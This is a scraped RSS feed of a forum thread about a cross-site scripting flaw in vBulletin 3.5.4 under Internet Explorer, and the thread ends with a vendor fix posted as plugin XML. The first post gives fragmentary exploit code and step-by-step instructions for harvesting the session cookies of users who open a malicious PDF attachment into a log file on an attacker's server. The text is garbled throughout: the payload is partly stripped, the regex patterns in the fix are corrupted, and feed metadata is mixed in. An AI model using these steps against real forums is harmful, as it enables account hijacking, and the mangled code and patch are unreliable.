<![CDATA[Latest posts for the topic "XSS vbulletin 3.5.4 With IE "]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net XSS vbulletin 3.5.4 With IE document.write(''); document.location.href="https://www.google.com/adsense/testmagic.pdf"; c.php ----- Code: ------------- 1_ Write testmagic.pdf and c.php 2_ Put c.php on a webserver. 3_ Change the url in testmagic.pdf. 4_ Make a post with testmagic.pdf as attachement. 5_ When someone will look at your attachement, you will get his cookie in log.txt ]]> /hvaonline/posts/list/2428.html#12853 /hvaonline/posts/list/2428.html#12853 GMT XSS vbulletin 3.5.4 With IE /hvaonline/posts/list/2428.html#12855 /hvaonline/posts/list/2428.html#12855 GMT Fix XSS vbulletin 3.5.4 With IE http://www.vbulletin.com/forum/showpost.php?p=1177756&postcount=3 Code:
<?xml version="1.0" encoding="ISO-8859-1"?>

<product productid="vb354security" active="1">
	<title>Security Fix for Issue in vBulletin 3.5.4</title>
	<description>This fixes a security issue in vBulletin 3.5.4 and below.</description>
	<version>1.0</version>
	<codes>
	</codes>
	<templates>
	</templates>
	<plugins>
		<plugin active="1">
			<title>Security Fix</title>
			<hookname>wwwect_generic</hookname>
			<phpcode><![CDATA[$url = str_replace(chr(0), '', $url);
$url = create_full_url($url);
$js_url = addslashes_js($url, '"'); // " has been replaced by "

$url = preg_replace(
	array('/�*59;?/', '/�*3B;?/i', '#;#'),
	'%3B',
	$url
);
$url = preg_replace('#&%3B#i', '&', $url);]]></phpcode>
		</plugin>
	</plugins>
	<phrases>
	</phrases>
	<options>
	</options>
</product>
]]>
/hvaonline/posts/list/2428.html#13466 /hvaonline/posts/list/2428.html#13466 GMT
XSS vbulletin 3.5.4 With IE /hvaonline/posts/list/2428.html#13642 /hvaonline/posts/list/2428.html#13642 GMT